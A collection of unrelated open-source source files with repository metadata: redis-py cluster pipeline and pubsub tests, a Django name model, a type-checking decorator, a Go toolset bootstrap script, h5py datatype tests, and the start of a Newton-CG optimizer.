node_2 = ClusterNode("127.0.0.1", 7001)
# If all startup nodes fail to connect, connection error should be
# thrown
with pytest.raises(RedisClusterException) as e:
RedisCluster(startup_nodes=[node_1])
assert "Redis Cluster cannot be connected" in str(e.value)
with patch.object(
CommandsParser, "initialize", autospec=True
) as cmd_parser_initialize:
def cmd_init_mock(self, r):
self.commands = {
"get": {
"name": "get",
"arity": 2,
"flags": ["readonly", "fast"],
"first_key_pos": 1,
"last_key_pos": 1,
"step_count": 1,
}
}
cmd_parser_initialize.side_effect = cmd_init_mock
# When at least one startup node is reachable, the cluster
# initialization should succeeds
rc = RedisCluster(startup_nodes=[node_1, node_2])
assert rc.get_node(host=default_host, port=7001) is not None
assert rc.get_node(host=default_host, port=7002) is not None
@pytest.mark.onlycluster
class TestClusterPubSubObject:
"""
Tests for the ClusterPubSub class
"""
def test_init_pubsub_with_host_and_port(self, r):
"""
Test creation of pubsub instance with passed host and port
"""
node = r.get_default_node()
p = r.pubsub(host=node.host, port=node.port)
assert p.get_pubsub_node() == node
def test_init_pubsub_with_node(self, r):
"""
Test creation of pubsub instance with passed node
"""
node = r.get_default_node()
p = r.pubsub(node=node)
assert p.get_pubsub_node() == node
def test_init_pubusub_without_specifying_node(self, r):
"""
Test creation of pubsub instance without specifying a node. The node
should be determined based on the keyslot of the first command
execution.
"""
channel_name = "foo"
node = r.get_node_from_key(channel_name)
p = r.pubsub()
assert p.get_pubsub_node() is None
p.subscribe(channel_name)
assert p.get_pubsub_node() == node
def test_init_pubsub_with_a_non_existent_node(self, r):
"""
Test creation of pubsub instance with node that doesn't exists in the
cluster. RedisClusterException should be raised.
"""
node = ClusterNode("1.1.1.1", 1111)
with pytest.raises(RedisClusterException):
r.pubsub(node)
def test_init_pubsub_with_a_non_existent_host_port(self, r):
"""
Test creation of pubsub instance with host and port that don't belong
to a node in the cluster.
RedisClusterException should be raised.
"""
with pytest.raises(RedisClusterException):
r.pubsub(host="1.1.1.1", port=1111)
def test_init_pubsub_host_or_port(self, r):
"""
Test creation of pubsub instance with host but without port, and vice
versa. DataError should be raised.
"""
with pytest.raises(DataError):
r.pubsub(host="localhost")
with pytest.raises(DataError):
r.pubsub(port=16379)
def test_get_redis_connection(self, r):
"""
Test that get_redis_connection() returns the redis connection of the
set pubsub node
"""
node = r.get_default_node()
p = r.pubsub(node=node)
assert p.get_redis_connection() == node.redis_connection
@pytest.mark.onlycluster
class TestClusterPipeline:
"""
Tests for the ClusterPipeline class
"""
def test_blocked_methods(self, r):
"""
Currently some method calls on a Cluster pipeline
is blocked when using in cluster mode.
They maybe implemented in the future.
"""
pipe = r.pipeline()
with pytest.raises(RedisClusterException):
pipe.multi()
with pytest.raises(RedisClusterException):
pipe.immediate_execute_command()
with pytest.raises(RedisClusterException):
pipe._execute_transaction(None, None, None)
with pytest.raises(RedisClusterException):
pipe.load_scripts()
with pytest.raises(RedisClusterException):
pipe.watch()
with pytest.raises(RedisClusterException):
pipe.unwatch()
with pytest.raises(RedisClusterException):
pipe.script_load_for_pipeline(None)
with pytest.raises(RedisClusterException):
pipe.eval()
def test_blocked_arguments(self, r):
"""
Currently some arguments is blocked when using in cluster mode.
They maybe implemented in the future.
"""
with pytest.raises(RedisClusterException) as ex:
r.pipeline(transaction=True)
assert (
str(ex.value).startswith("transaction is deprecated in cluster mode")
is True
)
with pytest.raises(RedisClusterException) as ex:
r.pipeline(shard_hint=True)
assert (
str(ex.value).startswith("shard_hint is deprecated in cluster mode") is True
)
def test_redis_cluster_pipeline(self, r):
"""
Test that we can use a pipeline with the RedisCluster class
"""
with r.pipeline() as pipe:
pipe.set("foo", "bar")
pipe.get("foo")
assert pipe.execute() == [True, b"bar"]
def test_mget_disabled(self, r):
"""
Test that mget is disabled for ClusterPipeline
"""
with r.pipeline() as pipe:
with pytest.raises(RedisClusterException):
pipe.mget(["a"])
def test_mset_disabled(self, r):
"""
Test that mset is disabled for ClusterPipeline
"""
with r.pipeline() as pipe:
with pytest.raises(RedisClusterException):
pipe.mset({"a": 1, "b": 2})
def test_rename_disabled(self, r):
"""
Test that rename is disabled for ClusterPipeline
"""
with r.pipeline(transaction=False) as pipe:
with pytest.raises(RedisClusterException):
pipe.rename("a", "b")
def test_renamenx_disabled(self, r):
"""
Test that renamenx is disabled for ClusterPipeline
"""
with r.pipeline(transaction=False) as pipe:
with pytest.raises(RedisClusterException):
pipe.renamenx("a", "b")
def test_delete_single(self, r):
"""
Test a single delete operation
"""
r["a"] = 1
with r.pipeline(transaction=False) as pipe:
pipe.delete("a")
assert pipe.execute() == [1]
def test_multi_delete_unsupported(self, r):
"""
Test that multi delete operation is unsupported
"""
with r.pipeline(transaction=False) as pipe:
r["a"] = 1
r["b"] = 2
with pytest.raises(RedisClusterException):
pipe.delete("a", "b")
def test_brpoplpush_disabled(self, r):
"""
Test that brpoplpush is disabled for ClusterPipeline
"""
with r.pipeline(transaction=False) as pipe:
with pytest.raises(RedisClusterException):
pipe.brpoplpush()
def test_rpoplpush_disabled(self, r):
"""
Test that rpoplpush is disabled for ClusterPipeline
"""
with r.pipeline(transaction=False) as pipe:
with pytest.raises(RedisClusterException):
pipe.rpoplpush()
def test_sort_disabled(self, r):
"""
Test that sort is disabled for ClusterPipeline
"""
with r.pipeline(transaction=False) as pipe:
with pytest.raises(RedisClusterException):
pipe.sort()
def test_sdiff_disabled(self, r):
"""
Test that sdiff is disabled for ClusterPipeline
"""
with r.pipeline(transaction=False) as pipe:
with pytest.raises(RedisClusterException):
pipe.sdiff()
def test_sdiffstore_disabled(self, r):
"""
Test that sdiffstore is disabled for ClusterPipeline
"""
with r.pipeline(transaction=False) as pipe:
with pytest.raises(RedisClusterException):
pipe.sdiffstore()
def test_sinter_disabled(self, r):
"""
Test that sinter is disabled for ClusterPipeline
"""
with r.pipeline(transaction=False) as pipe:
with pytest.raises(RedisClusterException):
pipe.sinter()
def test_sinterstore_disabled(self, r):
"""
Test that sinterstore is disabled for ClusterPipeline
"""
with r.pipeline(transaction=False) as pipe:
with pytest.raises(RedisClusterException):
pipe.sinterstore()
def test_smove_disabled(self, r):
"""
Test that move is disabled for ClusterPipeline
"""
with r.pipeline(transaction=False) as pipe:
with pytest.raises(RedisClusterException):
pipe.smove()
def test_sunion_disabled(self, r):
"""
Test that sunion is disabled for ClusterPipeline
"""
with r.pipeline(transaction=False) as pipe:
with pytest.raises(RedisClusterException):
pipe.sunion()
def test_sunionstore_disabled(self, r):
"""
Test that sunionstore is disabled for ClusterPipeline
"""
with r.pipeline(transaction=False) as pipe:
with pytest.raises(RedisClusterException):
pipe.sunionstore()
def test_spfmerge_disabled(self, r):
"""
Test that spfmerge is disabled for ClusterPipeline
"""
with r.pipeline(transaction=False) as pipe:
with pytest.raises(RedisClusterException):
pipe.pfmerge()
def test_multi_key_operation_with_a_single_slot(self, r):
"""
Test multi key operation with a single slot
"""
pipe = r.pipeline(transaction=False)
pipe.set("a{foo}", 1)
pipe.set("b{foo}", 2)
pipe.set("c{foo}", 3)
pipe.get("a{foo}")
pipe.get("b{foo}")
pipe.get("c{foo}")
res = pipe.execute()
assert res == [True, True, True, b"1", b"2", b"3"]
def test_multi_key_operation_with_multi_slots(self, r):
"""
Test multi key operation with more than one slot
"""
pipe = r.pipeline(transaction=False)
pipe.set("a{foo}", 1)
pipe.set("b{foo}", 2)
pipe.set("c{foo}", 3)
pipe.set("bar", 4)
pipe.set("bazz", 5)
pipe.get("a{foo}")
pipe.get("b{foo}")
pipe.get("c{foo}")
pipe.get("bar")
pipe.get("bazz")
res = pipe.execute()
assert res == [True, True, True, True, True, b"1", b"2", b"3", b"4", b"5"]
def test_connection_error_not_raised(self, r):
"""
Test that the pipeline doesn't raise an error on connection error when
raise_on_error=False
"""
key = "foo"
node = r.get_node_from_key(key, False)
def raise_connection_error():
e = ConnectionError("error")
return e
with r.pipeline() as pipe:
mock_node_resp_func(node, raise_connection_error)
res = pipe.get(key).get(key).execute(raise_on_error=False)
assert node.redis_connection.connection.read_response.called
assert isinstance(res[0], ConnectionError)
def test_connection_error_raised(self, r):
"""
Test that the pipeline raises an error on connection error when
raise_on_error=True
"""
key = "foo"
node = r.get_node_from_key(key, False)
def raise_connection_error():
e = ConnectionError("error")
return e
with r.pipeline() as pipe:
mock_node_resp_func(node, raise_connection_error)
with pytest.raises(ConnectionError):
pipe.get(key).get(key).execute(raise_on_error=True)
def test_asking_error(self, r):
"""
Test redirection on ASK error
"""
key = "foo"
first_node = r.get_node_from_key(key, False)
ask_node = None
for node in r.get_nodes():
if node != first_node:
ask_node = node
break
if ask_node is None:
warnings.warn("skipping this test since the cluster has only one " "node")
return
ask_msg = f"{r.keyslot(key)} {ask_node.host}:{ask_node.port}"
def raise_ask_error():
raise AskError(ask_msg)
with r.pipeline() as pipe:
mock_node_resp_func(first_node, raise_ask_error)
mock_node_resp(ask_node, "MOCK_OK")
res = pipe.get(key).execute()
assert first_node.redis_connection.connection.read_response.called
assert ask_node.redis_connection.connection.read_response.called
assert res == ["MOCK_OK"]
def test_empty_stack(self, r):
"""
If pipeline is executed with no commands it should
return a empty list.
"""
p = r.pipeline()
result = p.execute()
assert result == []
@pytest.mark.onlycluster
class TestReadOnlyPipeline:
"""
Tests for ClusterPipeline class in readonly mode
"""
def test_pipeline_readonly(self, r):
"""
On readonly mode, we supports get related stuff only.
"""
r.readonly(target_nodes="all")
r.set("foo71", "a1") # we assume this key is set on 127.0.0.1:7001
r.zadd("foo88", {"z1": 1}) # we assume this key is set on 127.0.0.1:7002
r.zadd("foo88", {"z2": 4})
with r.pipeline() as readonly_pipe:
readonly_pipe.get("foo71").zrange("foo88", 0, 5, withscores=True)
assert readonly_pipe.execute() == [
b"a1",
[(b"z1", 1.0), (b"z2", 4)],
]
def test_moved_redirection_on_slave_with_default(self, r):
"""
On Pipeline, we redirected once and finally get from master with
readonly client when data is completely moved.
"""
key = "bar"
r.set(key, "foo")
# set read_from_replicas to True
r.read_from_replicas = True
primary = r.get_node_from_key(key, False)
replica = r.get_node_from_key(key, True)
with r.pipeline() as readwrite_pipe:
mock_node_resp(primary, "MOCK_FOO")
if replica is not None:
moved_error = f"{r.keyslot(key)} {primary.host}:{primary.port}"
def raise_moved_error():
raise MovedError(moved_error)
mock_node_resp_func(replica, raise_moved_error)
assert readwrite_pipe.reinitialize_counter == 0
readwrite_pipe.get(key).get(key)
assert readwrite_pipe.execute() == ["MOCK_FOO", "MOCK_FOO"]
if replica is not None:
# the slot has a replica as well, so MovedError should have
# occurred. If MovedError occurs, we should see the
# reinitialize_counter increase.
assert readwrite_pipe.reinitialize_counter == 1
conn = replica.redis_connection.connection
assert conn.read_response.called is True
def test_readonly_pipeline_from_readonly_client(self, request):
"""
Test that the pipeline is initialized with readonly mode if the client
has it enabled
"""
# Create a cluster with reading from replications
ro = _get_client(RedisCluster, request, read_from_replicas=True)
key = "bar"
ro.set(key, "foo")
import time
time.sleep(0.2)
with ro.pipeline() as readonly_pipe:
mock_all_nodes_resp(ro, "MOCK_OK")
assert readonly_pipe.read_from_replicas is True
assert readonly_pipe.get(key).get(key).execute() == ["MOCK_OK", "MOCK_OK"]
slot_nodes = ro.nodes_manager.slots_cache[ro.keyslot(key)]
if len(slot_nodes) > 1:
executed_on_replica = False
for node in slot_nodes:
if node.server_type == REPLICA:
conn = node.redis_connection.connection
executed_on_replica = conn.read_response.called
if executed_on_replica:
break
assert executed_on_replica is True
@pytest.mark.onlycluster
class TestClusterMonitor:
def test_wait_command_not_found(self, r):
"Make sure the wait_for_command func works when command is not found"
key = "foo"
node = r.get_node_from_key(key)
with r.monitor(target_node=node) as m:
response = wait_for_command(r, m, "nothing", key=key)
assert response is None
def test_response_values(self, r):
db = 0
key = "foo"
node = r.get_node_from_key(key)
with r.monitor(target_node=node) as m:
r.ping(target_nodes=node)
response = wait_for_command(r, m, "PING", key=key)
assert isinstance(response["time"], float)
assert response["db"] == db
assert response["client_type"] in ("tcp", "unix")
assert isinstance(response["client_address"], str)
assert isinstance(response["client_port"], str)
assert response["command"] == "PING"
def test_command_with_quoted_key(self, r):
key = "{foo}1"
node = r.get_node_from_key(key)
with r.monitor(node) as m:
r.get('{foo}"bar')
response = wait_for_command(r, m, 'GET {foo}"bar', key=key)
assert response["command"] == 'GET {foo}"bar'
def test_command_with_binary_data(self, r):
key = "{foo}1"
node = r.get_node_from_key(key)
with r.monitor(target_node=node) as m:
byte_string = b"{foo}bar\x92"
r.get(byte_string)
response = wait_for_command(r, m, "GET {foo}bar\\x92", key=key)
assert response["command"] == "GET {foo}bar\\x92"
def test_command_with_escaped_data(self, r):
key = "{foo}1"
node = r.get_node_from_key(key)
with r.monitor(target_node=node) as m:
byte_string = b"{foo}bar\\x92"
r.get(byte_string)
response = wait_for_command(r, m, "GET {foo}bar\\\\x92", key=key)
assert response["command"] == "GET {foo}bar\\\\x92"
def test_flush(self, r):
r.set("x", "1")
r.set("z", "1")
r.flushall()
assert r.get("x") is None
assert r.get("y") is None
|
{
"content_hash": "b099d640b6365676368e720e31347b96",
"timestamp": "",
"source": "github",
"line_count": 2795,
"max_line_length": 88,
"avg_line_length": 37.979248658318426,
"alnum_prop": 0.5424485643228578,
"repo_name": "alisaifee/redis-py",
"id": "de41a107dc80176d64837162d1bbdb5a3c0ff0a1",
"size": "106160",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_cluster.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "96"
},
{
"name": "Python",
"bytes": "1956564"
},
{
"name": "Shell",
"bytes": "11822"
}
],
"symlink_target": ""
}
|
from django.db import models
NAME_GENDER_CHOICE = (
(0, u'male'),
(1, u'female'),
(2, u'neutral'),
)
class Name(models.Model):
name = models.CharField('name', unique=True, max_length=16)
cname = models.CharField('cname', max_length=16, null=True, blank=True)
pronounce = models.CharField('pronounce', max_length=32, null=True, blank=True)
gender = models.SmallIntegerField(choices=NAME_GENDER_CHOICE, db_index=True, default=0)
rank = models.IntegerField('rank', default=0)
description = models.TextField('description', null=True, blank=True)
mp3 = models.FileField(upload_to='./mp3', blank=True)
def __unicode__(self):
return self.name
def has_cname(self):
if self.cname:
return True
else:
return False
def has_description(self):
if self.description:
return True
else:
return False
class Pinyin(models.Model):
name = models.CharField('name', unique=True, max_length=16)
roma = models.TextField('description', null=True, blank=True)
def __unicode__(self):
return self.name
|
{
"content_hash": "e4793c13e88bb9ba868fbf65f66152e1",
"timestamp": "",
"source": "github",
"line_count": 40,
"max_line_length": 91,
"avg_line_length": 34.65,
"alnum_prop": 0.5202020202020202,
"repo_name": "masiqi/ename",
"id": "14ddb9bb2ef0b9fd7ab1e8c3f11fc7987f0b704a",
"size": "1406",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "name/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "10680"
},
{
"name": "Python",
"bytes": "171679"
}
],
"symlink_target": ""
}
|
"""
Functions that help with dynamically creating decorators.
:copyright: 2008 by Takanori Ishikawa
:license: MIT, see LICENSE for more details.
"""
from types import NoneType
from modipyd.utils.core import sequence
def require(**types):
"""
Lets you annotate function with argument type requirements.
These type requirements are automatically checked by the system at
function invocation time.
"""
# pylint: disable-msg=W0622
def decorator(fn):
code = fn.func_code
argnames = code.co_varnames[:code.co_argcount]
argmaps = dict((name, i) for i, name in enumerate(argnames))
# None -> NoneType convertion
for name, constraints in types.iteritems():
constraints = sequence(constraints)
constraints = [c is None and NoneType or c for c in constraints]
if len(constraints) == 1:
types[name] = constraints[0]
else:
types[name] = tuple(constraints)
# pylint: disable-msg=W0621
# :W0621: *Redefining name %r from outer scope (line %s)*
def type_checker(*args, **kwargs):
for name in argmaps:
i = argmaps[name]
if i < len(args):
value = args[i]
elif name in kwargs:
value = kwargs[name]
else:
# maybe default value
continue
try:
constraint = types[name]
if (callable(constraint) and
not isinstance(constraint, type)):
if not constraint(value):
raise TypeError("Type checking of '%s' was failed: "
"%s(%s)" % (name, value, type(value)))
elif not isinstance(value, constraint):
raise TypeError(
"Expected '%s' to be %s, but was %s." %
(name, types[name], type(value)))
except KeyError:
pass
return fn(*args, **kwargs)
type_checker.__name__ = fn.__name__
type_checker.__module__ = fn.__module__
type_checker.__dict__ = fn.__dict__
type_checker.__doc__ = fn.__doc__
return type_checker
return decorator
|
{
"content_hash": "c98c234fb27b008b461224639b5dcc0a",
"timestamp": "",
"source": "github",
"line_count": 69,
"max_line_length": 80,
"avg_line_length": 34.88405797101449,
"alnum_prop": 0.5118404653095139,
"repo_name": "ishikawa/modipyd",
"id": "10f6e4cb927ac5215574556aa913e91eaa307472",
"size": "2407",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "modipyd/utils/decorators.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "154416"
}
],
"symlink_target": ""
}
|
"""Prepares a local hermetic Go installation.
- Downloads and unpacks the Go toolset in ../golang.
"""
import contextlib
import logging
import os
import platform
import shutil
import stat
import subprocess
import sys
import tarfile
import tempfile
import urllib
import zipfile
# TODO(vadimsh): Migrate to new golang.org/x/ paths once Golang moves to
# git completely.
LOGGER = logging.getLogger(__name__)
# /path/to/util/bot
ROOT = os.path.dirname(os.path.abspath(__file__))
# Where to install Go toolset to. GOROOT would be <TOOLSET_ROOT>/go.
TOOLSET_ROOT = os.path.join(os.path.dirname(ROOT), 'golang')
# Default workspace with infra go code.
WORKSPACE = os.path.join(ROOT, 'go')
# Platform depended suffix for executable files.
EXE_SFX = '.exe' if sys.platform == 'win32' else ''
# Pinned version of Go toolset to download.
TOOLSET_VERSION = 'go1.7.3'
# Platform dependent portion of a download URL. See http://golang.org/dl/.
TOOLSET_VARIANTS = {
('darwin', 'x86-64'): 'darwin-amd64.tar.gz',
('linux2', 'x86-32'): 'linux-386.tar.gz',
('linux2', 'x86-64'): 'linux-amd64.tar.gz',
('win32', 'x86-32'): 'windows-386.zip',
('win32', 'x86-64'): 'windows-amd64.zip',
}
# Download URL root.
DOWNLOAD_URL_PREFIX = 'https://storage.googleapis.com/golang'
class Failure(Exception):
"""Bootstrap failed."""
def get_toolset_url():
"""URL of a platform specific Go toolset archive."""
# TODO(vadimsh): Support toolset for cross-compilation.
arch = {
'amd64': 'x86-64',
'x86_64': 'x86-64',
'i386': 'x86-32',
'x86': 'x86-32',
}.get(platform.machine().lower())
variant = TOOLSET_VARIANTS.get((sys.platform, arch))
if not variant:
# TODO(vadimsh): Compile go lang from source.
raise Failure('Unrecognized platform')
return '%s/%s.%s' % (DOWNLOAD_URL_PREFIX, TOOLSET_VERSION, variant)
def read_file(path):
"""Returns contents of a given file or None if not readable."""
assert isinstance(path, (list, tuple))
try:
with open(os.path.join(*path), 'r') as f:
return f.read()
except IOError:
return None
def write_file(path, data):
"""Writes |data| to a file."""
assert isinstance(path, (list, tuple))
with open(os.path.join(*path), 'w') as f:
f.write(data)
def remove_directory(path):
"""Recursively removes a directory."""
assert isinstance(path, (list, tuple))
p = os.path.join(*path)
if not os.path.exists(p):
return
LOGGER.info('Removing %s', p)
# Crutch to remove read-only file (.git/* in particular) on Windows.
def onerror(func, path, _exc_info):
if not os.access(path, os.W_OK):
os.chmod(path, stat.S_IWUSR)
func(path)
else:
raise
shutil.rmtree(p, onerror=onerror if sys.platform == 'win32' else None)
def install_toolset(toolset_root, url):
"""Downloads and installs Go toolset.
GOROOT would be <toolset_root>/go/.
"""
if not os.path.exists(toolset_root):
os.makedirs(toolset_root)
pkg_path = os.path.join(toolset_root, url[url.rfind('/')+1:])
LOGGER.info('Downloading %s...', url)
download_file(url, pkg_path)
LOGGER.info('Extracting...')
if pkg_path.endswith('.zip'):
with zipfile.ZipFile(pkg_path, 'r') as f:
f.extractall(toolset_root)
elif pkg_path.endswith('.tar.gz'):
with tarfile.open(pkg_path, 'r:gz') as f:
f.extractall(toolset_root)
else:
raise Failure('Unrecognized archive format')
LOGGER.info('Validating...')
if not check_hello_world(toolset_root):
raise Failure('Something is not right, test program doesn\'t work')
def download_file(url, path):
"""Fetches |url| to |path|."""
last_progress = [0]
def report(a, b, c):
progress = int(a * b * 100.0 / c)
if progress != last_progress[0]:
print >> sys.stderr, 'Downloading... %d%%' % progress
last_progress[0] = progress
# TODO(vadimsh): Use something less crippled, something that validates SSL.
urllib.urlretrieve(url, path, reporthook=report)
@contextlib.contextmanager
def temp_dir(path):
"""Creates a temporary directory, then deletes it."""
tmp = tempfile.mkdtemp(dir=path)
try:
yield tmp
finally:
remove_directory([tmp])
def check_hello_world(toolset_root):
"""Compiles and runs 'hello world' program to verify that toolset works."""
with temp_dir(toolset_root) as tmp:
path = os.path.join(tmp, 'hello.go')
write_file([path], r"""
package main
func main() { println("hello, world\n") }
""")
out = subprocess.check_output(
[get_go_exe(toolset_root), 'run', path],
env=get_go_environ(toolset_root, tmp),
stderr=subprocess.STDOUT)
if out.strip() != 'hello, world':
LOGGER.error('Failed to run sample program:\n%s', out)
return False
return True
def ensure_toolset_installed(toolset_root):
"""Installs or updates Go toolset if necessary.
Returns True if new toolset was installed.
"""
installed = read_file([toolset_root, 'INSTALLED_TOOLSET'])
available = get_toolset_url()
if installed == available:
LOGGER.debug('Go toolset is up-to-date: %s', TOOLSET_VERSION)
return False
LOGGER.info('Installing Go toolset.')
LOGGER.info(' Old toolset is %s', installed)
LOGGER.info(' New toolset is %s', available)
remove_directory([toolset_root])
install_toolset(toolset_root, available)
LOGGER.info('Go toolset installed: %s', TOOLSET_VERSION)
write_file([toolset_root, 'INSTALLED_TOOLSET'], available)
return True
def get_go_environ(
toolset_root,
workspace=None):
"""Returns a copy of os.environ with added GO* environment variables.
Overrides GOROOT, GOPATH and GOBIN. Keeps everything else. Idempotent.
Args:
toolset_root: GOROOT would be <toolset_root>/go.
workspace: main workspace directory or None if compiling in GOROOT.
"""
env = os.environ.copy()
env['GOROOT'] = os.path.join(toolset_root, 'go')
if workspace:
env['GOBIN'] = os.path.join(workspace, 'bin')
else:
env.pop('GOBIN', None)
all_go_paths = []
if workspace:
all_go_paths.append(workspace)
env['GOPATH'] = os.pathsep.join(all_go_paths)
# New PATH entries.
paths_to_add = [
os.path.join(env['GOROOT'], 'bin'),
env.get('GOBIN'),
]
# Make sure not to add duplicates entries to PATH over and over again when
# get_go_environ is invoked multiple times.
path = env['PATH'].split(os.pathsep)
paths_to_add = [p for p in paths_to_add if p and p not in path]
env['PATH'] = os.pathsep.join(paths_to_add + path)
return env
def get_go_exe(toolset_root):
"""Returns path to go executable."""
return os.path.join(toolset_root, 'go', 'bin', 'go' + EXE_SFX)
def bootstrap(logging_level):
"""Installs all dependencies in default locations.
Supposed to be called at the beginning of some script (it modifies logger).
Args:
logging_level: logging level of bootstrap process.
"""
logging.basicConfig()
LOGGER.setLevel(logging_level)
ensure_toolset_installed(TOOLSET_ROOT)
def prepare_go_environ():
"""Returns dict with environment variables to set to use Go toolset.
Installs or updates the toolset if necessary.
"""
bootstrap(logging.INFO)
return get_go_environ(TOOLSET_ROOT, WORKSPACE)
def find_executable(name, workspaces):
"""Returns full path to an executable in some bin/ (in GOROOT or GOBIN)."""
basename = name
if EXE_SFX and basename.endswith(EXE_SFX):
basename = basename[:-len(EXE_SFX)]
roots = [os.path.join(TOOLSET_ROOT, 'go', 'bin')]
for path in workspaces:
roots.extend([
os.path.join(path, 'bin'),
])
for root in roots:
full_path = os.path.join(root, basename + EXE_SFX)
if os.path.exists(full_path):
return full_path
return name
def main(args):
if args:
print >> sys.stderr, sys.modules[__name__].__doc__,
return 2
bootstrap(logging.DEBUG)
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
{
"content_hash": "4f3607adb7b1aa6641393618d8b2a9a8",
"timestamp": "",
"source": "github",
"line_count": 286,
"max_line_length": 77,
"avg_line_length": 27.615384615384617,
"alnum_prop": 0.6686502912129653,
"repo_name": "MichaLasry/ImageTalke",
"id": "5661be2d3660931a641a33afc651f93e85e9d7b3",
"size": "8257",
"binary": false,
"copies": "12",
"ref": "refs/heads/master",
"path": "functions/node_modules/firebase-admin/node_modules/grpc/third_party/boringssl/util/bot/go/bootstrap.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "16893"
},
{
"name": "HTML",
"bytes": "8629"
},
{
"name": "JavaScript",
"bytes": "1948"
},
{
"name": "TypeScript",
"bytes": "75238"
}
],
"symlink_target": ""
}
|
"""
H5T tests. This handles the general API behavior and exceptions; full
type-specific tests (including conversion) are tested elsewhere.
"""
from h5py import tests
from h5py import *
import numpy as np
class Base(tests.HTest):
pass
class TestCreate(Base):
def test_create(self):
""" (H5T) create() """
tid = h5t.create(h5t.OPAQUE, 72)
self.assertIsInstance(tid, h5t.TypeOpaqueID)
def test_exc(self):
""" (H5T) ValueError for non-opaque, non-compound class """
self.assertRaises(ValueError, h5t.create, h5t.INTEGER, 4)
class TestCommit(Base):
def setUp(self):
self.fid, self.name = tests.gettemp()
def tearDown(self):
import os
self.fid.close()
os.unlink(self.name)
def test_commit_committed(self):
""" (H5T) Commit type changes committed() """
tid = h5t.STD_I32LE.copy()
self.assert_(not tid.committed())
tid.commit(self.fid, 'name')
self.assert_(tid.committed())
@tests.require(api=18)
def test_commit_pl(self):
""" (H5T) Commit type with non-default LCPL """
tid = h5t.STD_I32LE.copy()
tid.commit(self.fid, 'name', lcpl=h5p.create(h5p.LINK_CREATE))
self.assert_(tid.committed())
def test_open(self):
""" (H5T) Open committed type """
tid = h5t.STD_I32LE.copy()
tid.commit(self.fid, 'name')
tid2 = h5t.open(self.fid, 'name')
self.assertEqual(tid, tid2)
def test_open_exc(self):
""" (H5T) Open missing type raises KeyError """
self.assertRaises(KeyError, h5t.open, self.fid, 'missing')
class TestTypeID(Base):
""" Common simple TypeID operations """
def test_copy(self):
""" (H5T) copy() """
tid = h5t.create(h5t.OPAQUE, 72)
tid2 = tid.copy()
self.assertEqual(tid, tid2)
self.assert_(tid is not tid2)
def test_equal(self):
""" (H5T) equal() """
tid = h5t.STD_I32LE.copy()
self.assert_(tid.equal(h5t.STD_I32LE))
self.assert_(h5t.STD_I32LE.equal(tid))
self.assert_(not tid.equal(h5t.STD_I32BE))
def test_get_class(self):
""" (H5T) get_class() """
self.assertEqual(h5t.STD_I32LE.get_class(), h5t.INTEGER)
class TestEncodeDecode(Base):
def setUp(self):
self.tid = h5t.STD_I32LE.copy()
def tearDown(self):
del self.tid
@tests.require(api=18)
def test_ed(self):
""" (H5T) Encode/decode round trip """
enc = self.tid.encode()
self.assertIsInstance(enc, str)
dec = h5t.decode(enc)
self.assertEqual(self.tid, dec)
@tests.require(api=18)
def test_pickle(self):
""" (H5T) Encode/decode round trip via pickling """
import pickle
pkl = pickle.dumps(self.tid)
dec = pickle.loads(pkl)
self.assertEqual(self.tid, dec)
class TestFloat(Base):
@tests.require(hasattr(np, 'float128'))
def test_float_exc(self):
""" (H5T) Unsupported float size raises TypeError """
self.assertRaises(TypeError, h5t.py_create, np.float128)
class TestInteger(Base):
def test_order(self):
""" (H5T) integer byte order """
tid = h5t.STD_I32LE.copy()
self.assertEqual(tid.get_order(), h5t.ORDER_LE)
tid.set_order(h5t.ORDER_BE)
self.assertEqual(tid.get_order(), h5t.ORDER_BE)
def test_sign(self):
""" (H5T) integer sign """
tid = h5t.STD_I32LE.copy()
self.assertEqual(tid.get_sign(), h5t.SGN_2)
tid.set_sign(h5t.SGN_NONE)
self.assertEqual(tid.get_sign(), h5t.SGN_NONE)
|
{
"content_hash": "b052ffd0e691217dcdadf37461160a47",
"timestamp": "",
"source": "github",
"line_count": 129,
"max_line_length": 74,
"avg_line_length": 28.333333333333332,
"alnum_prop": 0.5937072503419972,
"repo_name": "qsnake/h5py",
"id": "a012407cf0dd8e555f060e190122f57fc5cd5340",
"size": "3656",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "h5py/tests/low/test_h5t.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "8023197"
},
{
"name": "Python",
"bytes": "257412"
}
],
"symlink_target": ""
}
|
"""
Our own implementation of the Newton algorithm
Unlike the scipy.optimize version, this version of the Newton conjugate
gradient solver uses only one function call to retrieve the
func value, the gradient value and a callable for the Hessian matvec
product. If the function call is very expensive (e.g. for logistic
regression with large design matrix), this approach gives very
significant speedups.
"""
# This is a modified file from scipy.optimize
# Original authors: Travis Oliphant, Eric Jones
# Modifications by Gael Varoquaux, Mathieu Blondel and Tom Dupre la Tour
# License: BSD
import warnings
import numpy as np
from scipy.optimize.linesearch import line_search_wolfe2, line_search_wolfe1
class _LineSearchError(RuntimeError):
pass
def _line_search_wolfe12(f, fprime, xk, pk, gfk, old_fval, old_old_fval,
**kwargs):
"""
Same as line_search_wolfe1, but fall back to line_search_wolfe2 if
suitable step length is not found, and raise an exception if a
suitable step length is not found.
Raises
------
_LineSearchError
If no suitable step size is found
"""
ret = line_search_wolfe1(f, fprime, xk, pk, gfk,
old_fval, old_old_fval,
**kwargs)
if ret[0] is None:
# line search failed: try different one.
ret = line_search_wolfe2(f, fprime, xk, pk, gfk,
old_fval, old_old_fval, **kwargs)
if ret[0] is None:
raise _LineSearchError()
return ret
def _cg(fhess_p, fgrad, maxiter, tol):
"""
Solve iteratively the linear system 'fhess_p . xsupi = fgrad'
with a conjugate gradient descent.
Parameters
----------
fhess_p : callable
Function that takes the gradient as a parameter and returns the
matrix product of the Hessian and gradient
fgrad : ndarray, shape (n_features,) or (n_features + 1,)
Gradient vector
maxiter : int
Number of CG iterations.
tol : float
Stopping criterion.
Returns
-------
xsupi : ndarray, shape (n_features,) or (n_features + 1,)
Estimated solution
"""
xsupi = np.zeros(len(fgrad), dtype=fgrad.dtype)
